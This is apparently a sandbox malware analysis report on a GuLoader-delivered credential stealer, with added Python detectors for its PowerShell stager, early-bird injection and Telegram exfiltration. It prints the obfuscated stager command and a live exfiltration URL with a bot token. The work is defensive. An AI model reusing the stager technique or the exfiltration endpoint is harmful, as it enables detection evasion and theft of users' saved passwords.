            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX (57 occurrences)
            Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7586
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2140
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_00406448 FindFirstFileA,FindClose
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_0040589C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_004027A1 FindFirstFileA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: msiexec.exe, 00000006.00000002.3284691137.00000000079E6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | API call chain: ExitProcess graph end node graph_0-3391
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_04E1F2A0 LdrInitializeThunk,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\msiexec.exe | Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 44E0000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$retskrivningsreformer=get-content -raw 'c:\users\user\appdata\roaming\skittaget\lektier\tegnkapacitet\dyretmmeren.lge';$sammenskriv=$retskrivningsreformer.substring(71921,3);.$sammenskriv($retskrivningsreformer) " (reported twice)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (8 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation
            Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\dP5z8RpEyQ.exe | Code function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
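The command line the sample hands to powershell.exe (listed above in this section) is the usual GuLoader stager: Get-Content -Raw loads the dropped Dyretmmeren.Lge as a single string, .substring(71921,3) pulls three characters out of it, and the dot operator invokes whatever command those three characters name, with the whole file as its argument. The invoked command (in practice the iex alias for Invoke-Expression) never appears in the command line, so a rule that looks for "iex" or "Invoke-Expression" in process-creation events misses it; the thing to key on is the shape: a substring of a file read with -raw being dot-invoked on that same file. The Python below is an added example written for this page, not part of the Joe Sandbox report. It parses that shape out of a command line and, given the dropped file's text, resolves the token the way PowerShell would. The report does not include Dyretmmeren.Lge, so the file contents used here are a constructed stand-in with the alias placed at the offset.

```python
import re
from dataclasses import dataclass
from typing import Optional

# GuLoader-style PowerShell stager as seen in the report:
#   $a=get-content -raw '<path>';$b=$a.substring(<offset>,<length>);.$b($a)
# Variable names are randomised per build, so they are bound by back-reference
# rather than hard-coded. IGNORECASE because the sandbox lower-cases the
# command line while real samples are mixed case.
STAGER_RE = re.compile(
    r"\$(?P<blob>\w+)\s*=\s*get-content\s+-raw\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<cmd>\w+)\s*=\s*\$(?P=blob)\.substring\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)\s*;"
    r"\s*\.\s*\$(?P=cmd)\s*\(\s*\$(?P=blob)\s*\)",
    re.IGNORECASE,
)

# Three-character command names that reach Invoke-Expression. 'iex' is the
# built-in alias; a sample could define its own, so resolve_token() returns
# whatever sits at the offset and is_invoke_expression() only classifies it.
IEX_ALIASES = {"iex"}


@dataclass
class StagerMatch:
    path: str       # dropped file the stager reads with Get-Content -Raw
    offset: int     # first argument to .substring()
    length: int     # second argument to .substring()
    blob_var: str   # variable holding the whole file
    cmd_var: str    # variable holding the resolved command name


def parse_stager(cmdline: str) -> Optional[StagerMatch]:
    """Return the stager parameters if cmdline matches the pattern, else None."""
    m = STAGER_RE.search(cmdline)
    if not m:
        return None
    return StagerMatch(
        path=m.group("path"),
        offset=int(m.group("off")),
        length=int(m.group("len")),
        blob_var=m.group("blob"),
        cmd_var=m.group("cmd"),
    )


def resolve_token(match: StagerMatch, file_text: str) -> Optional[str]:
    """Slice file_text exactly as String.Substring(offset, length) would.

    file_text must be the file decoded the way Get-Content decodes it
    (Windows PowerShell 5.1 defaults to the ANSI code page unless a BOM is
    present), because the offset is a character index, not a byte offset.
    Returns None when the file is too short; PowerShell would throw there and
    the stager would never run.
    """
    end = match.offset + match.length
    if end > len(file_text):
        return None
    return file_text[match.offset:end]


def is_invoke_expression(token: Optional[str]) -> bool:
    return token is not None and token.lower() in IEX_ALIASES


# Command line copied from the report (the sandbox renders it in lower case).
REPORT_CMDLINE = (
    'powershell.exe -windowstyle hidden "$retskrivningsreformer=get-content -raw '
    "'c:\\users\\user\\appdata\\roaming\\skittaget\\lektier\\tegnkapacitet\\dyretmmeren.lge';"
    '$sammenskriv=$retskrivningsreformer.substring(71921,3);.$sammenskriv($retskrivningsreformer) "'
)

# Constructed stand-in for Dyretmmeren.Lge (the report does not include the
# file): filler up to the offset, the alias at the offset, filler after it.
CONSTRUCTED_LGE = "#" * 71921 + "iex" + "#" * 500


if __name__ == "__main__":
    match = parse_stager(REPORT_CMDLINE)
    token = resolve_token(match, CONSTRUCTED_LGE) if match else None
    print(match)
    print("resolved command:", token, "-> Invoke-Expression:", is_invoke_expression(token))
```

For detection, parse_stager() on its own is enough: a non-None result on a process-creation event is the alert, and the (path, offset) pair is a per-build fingerprint that clusters related samples. resolve_token() is for the analyst who has recovered the dropped file and wants to confirm what the stager actually calls before decoding the rest of it.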

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Windows\SysWOW64\msiexec.exe | Registry value created: DisableCMD 1
            Source: C:\Windows\SysWOW64\reg.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistryTools

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY (2 signatures)
            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5064, type: MEMORYSTR (2 signatures)
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: Yara match | File source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5064, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY (2 signatures)
            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5064, type: MEMORYSTR (2 signatures)
            MITRE ATT&CK matrix: techniques flagged by the report, with the report's badge counts in parentheses. Tactics with no flagged technique are listed at the end.
            Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (1); PowerShell (1)
            Persistence: DLL Side-Loading (1)
            Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (311)
            Defense Evasion: Disable or Modify Tools (2); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1); Masquerading (11); Modify Registry (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (311)
            Credential Access: OS Credential Dumping (1)
            Discovery: File and Directory Discovery (2); System Information Discovery (14); Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1)
            Collection: Archive Collected Data (1); Data from Local System (1); Clipboard Data (1)
            Command and Control: Web Service (1); Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (14)
            Impact: System Shutdown/Reboot (1)
            No technique flagged: Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration
            Behavior Graph ID: 1576692 | Sample: dP5z8RpEyQ.exe | Start date: 17/12/2024 | Architecture: WINDOWS | Score: 100
            Contacted: api.telegram.org; drive.usercontent.google.com; 3 other IPs or domains
            Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 5 other signatures; Uses the Telegram API (likely for C&C communication) (api.telegram.org)
            Process chain:
            dP5z8RpEyQ.exe (graph badges: 1, 30) started; dropped C:\Users\user\AppData\...\Dyretmmeren.Lge (ASCII); signature: Suspicious powershell command line found
              -> powershell.exe (graph badge: 26); signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 2 other signatures
                 -> msiexec.exe (graph badges: 16, 8); connections: api.telegram.org 149.154.167.220 port 443 (client port 49867, TELEGRAMRU, United Kingdom); checkip.dyndns.com 193.122.130.0 port 80 (client port 49834, ORACLE-BMC-31898US, United States); 2 other IPs or domains; signatures: Tries to harvest and steal browser information (history, passwords, etc); Disables CMD prompt
                    -> reg.exe (graph badges: 1, 1); signature: Disables the Windows registry editor (regedit)
                       -> conhost.exe
                 -> conhost.exe
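The graph above and the HIPS evasion section together give the injection sequence in order: powershell.exe creates msiexec.exe, writes into it at base 0x44E0000, queues an APC to the new process's thread and then resumes it (the "Early bird" signature), after which msiexec.exe, not powershell.exe, is the process opening the Chrome and Edge Login Data files and talking to api.telegram.org. The msiexec.exe volume queries for .NET assemblies (System.Windows.Forms, Microsoft.VisualBasic, System.Web.Extensions) fit the same picture: a native Windows Installer binary does not load the CLR on its own, so the injected payload is managed code, consistent with MassLogger being a .NET stealer. The Python below is an added example written for this page, not part of the report. It correlates a constructed event stream per (actor, target) process pair and reports a pair only when create-suspended, foreign memory write, APC queue and thread resume occur in that order. The event names, the powershell.exe PID 4120 and the conhost.exe PID are invented for the example; the msiexec.exe PID 5064 and the write base are taken from the report.

```python
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Event kinds in the order the Early Bird technique produces them. The report
# calls them "Process created", "Memory written", "Thread APC queued" and
# "Resumed"; the identifiers below are our own (constructed).
CREATE, WRITE, APC, RESUME = "process_create", "memory_write", "apc_queue", "thread_resume"
EARLY_BIRD_ORDER = (CREATE, WRITE, APC, RESUME)


@dataclass
class Event:
    seq: int            # monotonic order as recorded by the sensor
    kind: str
    actor_pid: int      # process performing the action
    actor_image: str
    target_pid: int     # process acted upon (== actor_pid for self events)
    target_image: str
    detail: str = ""    # e.g. "base: 44E0000" or "flags: CREATE_SUSPENDED"


@dataclass
class Detection:
    actor: Tuple[int, str]
    target: Tuple[int, str]
    evidence: List[Event] = field(default_factory=list)

    def describe(self) -> str:
        steps = " -> ".join(e.kind for e in self.evidence)
        return (f"Early Bird injection: {self.actor[1]} (pid {self.actor[0]}) "
                f"into {self.target[1]} (pid {self.target[0]}): {steps}")


def detect_early_bird(events: List[Event]) -> List[Detection]:
    """Return one Detection per actor->target pair showing the full ordered chain.

    Only cross-process events count, and the CREATE step must carry the
    CREATE_SUSPENDED flag: a normal child creation followed by an unrelated
    APC does not match, and the steps must appear in EARLY_BIRD_ORDER.
    """
    by_pair: Dict[Tuple[int, int], List[Event]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.seq):
        if ev.actor_pid != ev.target_pid:
            by_pair[(ev.actor_pid, ev.target_pid)].append(ev)

    hits: List[Detection] = []
    for (apid, tpid), evs in by_pair.items():
        stage = 0
        evidence: List[Event] = []
        for ev in evs:
            want = EARLY_BIRD_ORDER[stage]
            if ev.kind != want:
                continue
            if want == CREATE and "CREATE_SUSPENDED" not in ev.detail:
                continue
            evidence.append(ev)
            stage += 1
            if stage == len(EARLY_BIRD_ORDER):
                hits.append(Detection((apid, evs[0].actor_image),
                                      (tpid, evs[0].target_image), evidence))
                break
    return hits


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MSI = r"C:\Windows\SysWOW64\msiexec.exe"
CONHOST = r"C:\Windows\System32\conhost.exe"

# Constructed event log modelled on the report's chain. PID 5064 (msiexec.exe)
# and the write base are from the report; PIDs 4120 and 4124 are invented.
SAMPLE_EVENTS = [
    Event(1, CREATE, 4120, PS, 5064, MSI, "flags: CREATE_SUSPENDED"),
    Event(2, CREATE, 4120, PS, 4124, CONHOST, ""),             # ordinary child, not suspended
    Event(3, WRITE, 4120, PS, 5064, MSI, "base: 44E0000"),
    Event(4, APC, 4120, PS, 5064, MSI, "thread: initial"),
    Event(5, RESUME, 4120, PS, 5064, MSI, ""),
    Event(6, WRITE, 5064, MSI, 5064, MSI, "self allocation"),  # self event, ignored
]


if __name__ == "__main__":
    for hit in detect_early_bird(SAMPLE_EVENTS):
        print(hit.describe())
```

Telemetry caveat: Sysmon records neither the CREATE_SUSPENDED flag on event 1 nor APC queuing at all, so with Sysmon alone the observable part of this chain is event 10 (ProcessAccess) from powershell.exe to msiexec.exe with a GrantedAccess mask that includes PROCESS_VM_WRITE (0x20) and PROCESS_VM_OPERATION (0x8). The four-step match as modelled here needs kernel ETW or EDR telemetry that exposes thread and APC events.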

            Source | Detection | Scanner | Label | Link
            dP5z8RpEyQ.exe | 66% | ReversingLabs | Win32.Trojan.Guloader |
            dP5z8RpEyQ.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches (reported three times)
            Source | Detection | Scanner | Label | Link
            http://crl.microsoft5or | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            drive.google.com | 172.217.19.174 | true | false | | high
            drive.usercontent.google.com | 142.250.181.1 | true | false | | high
            api.telegram.org | 149.154.167.220 | true | false | | high
            checkip.dyndns.com | 193.122.130.0 | true | false | | high
            checkip.dyndns.org | unknown | unknown | false | | high
            Name | Malicious | Antivirus Detection | Reputation
            http://checkip.dyndns.org/ | false | | high
            https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 | false | | high
            Note: the "high" reputation is the reputation of the api.telegram.org domain, not a verdict on this request; the URL is the sample's exfiltration endpoint, a sendDocument call with the bot token in the path and the receiving chat_id in the query.
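The second URL above is the exfiltration call itself: a Telegram Bot API sendDocument request with the bot token in the path, the operator's chat_id in the query, and a caption of the form user / Passwords / 8.46.123.189, where the IP is the public address the stealer looks up via checkip.dyndns.org earlier in the chain. The token and chat_id are the operator's credentials, so they are the indicators worth pulling from any dump of this family, and they pivot across samples the way a C2 domain would. The Python below is an added example written for this page, not part of the report. It extracts those fields from arbitrary text (here the three api.telegram.org strings the report lists for msiexec.exe memory), deliberately ignores the credential-free prefixes that also occur in the dump, and formats a line suitable for sharing.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import parse_qs

# Telegram Bot API requests carry the credential in the URL path:
#   https://api.telegram.org/bot<bot_id>:<token>/<method>?chat_id=...
# bot_id is numeric and the token is [A-Za-z0-9_-]. No token length is
# enforced so that a string truncated in a memory dump still yields bot_id.
TG_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]+)"
    r"(?:/(?P<method>[A-Za-z]+))?(?P<query>\?[^\s\"'<>]*)?"
)


@dataclass(frozen=True)
class TelegramC2:
    bot_id: int
    token: str                 # secret part after the colon
    method: Optional[str]      # e.g. sendDocument, sendMessage
    chat_id: Optional[str]     # operator's receiving chat
    caption: Optional[str]     # MassLogger format: "<user> / <category> / <public ip>"

    @property
    def full_token(self) -> str:
        return f"{self.bot_id}:{self.token}"


def extract_telegram_c2(text: str) -> List[TelegramC2]:
    """Return every distinct Telegram bot endpoint in text, in first-seen order.

    Bare prefixes such as 'https://api.telegram.org/bot' (format-string
    fragments that also sit in the dump) carry no credential and do not match.
    """
    seen = set()
    found: List[TelegramC2] = []
    for m in TG_RE.finditer(text):
        query = m.group("query")
        params = parse_qs(query[1:]) if query else {}   # parse_qs also percent-decodes
        rec = TelegramC2(
            bot_id=int(m.group("bot_id")),
            token=m.group("token"),
            method=m.group("method"),
            chat_id=params.get("chat_id", [None])[0],
            caption=params.get("caption", [None])[0],
        )
        if rec not in seen:
            seen.add(rec)
            found.append(rec)
    return found


def sharing_record(rec: TelegramC2) -> str:
    """IOC line for a write-up: bot_id and chat_id in full, token truncated.

    The full token is what an abuse report to Telegram needs; keep it in the
    case file rather than in a public report.
    """
    return (f"telegram bot_id={rec.bot_id} chat_id={rec.chat_id} "
            f"token={rec.token[:4]}... method={rec.method}")


# The three api.telegram.org strings this report lists for msiexec.exe memory.
REPORT_STRINGS = "\n".join([
    "https://api.telegram.org",
    "https://api.telegram.org/bot",
    "https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs"
    "/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189",
])


if __name__ == "__main__":
    for rec in extract_telegram_c2(REPORT_STRINGS):
        print(sharing_record(rec))
        print("caption:", rec.caption)
```

The nuget.org, pesterbdd.com, contoso.com and apache.org strings listed for powershell.exe in the next table come from the stock PowerShell modules (PackageManagement, Pester, PowerShellGet) and appear in benign powershell.exe memory as well; they are not indicators for this sample.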
URLs from Memory and Binary Data
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://translate.google.com/translate_a/element.js | msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | msiexec.exe, 00000006.00000002.3284691137.00000000079F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.org | msiexec.exe, 00000006.00000002.3296654914.0000000023663000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | dP5z8RpEyQ.exe | false | | high
https://api.telegram.org/bot7559875433:AAFPRDQeuf2xqh2rMfCDkngFwDdieRNQbYs/sendDocument?chat_id=7382 | msiexec.exe, 00000006.00000002.3296654914.0000000023715000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2622978623.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com | msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_Error | dP5z8RpEyQ.exe | false | | high
http://crl.microsoft5or | powershell.exe, 00000002.00000002.2621900945.0000000003359000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/ | msiexec.exe, 00000006.00000002.3284691137.000000000798A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
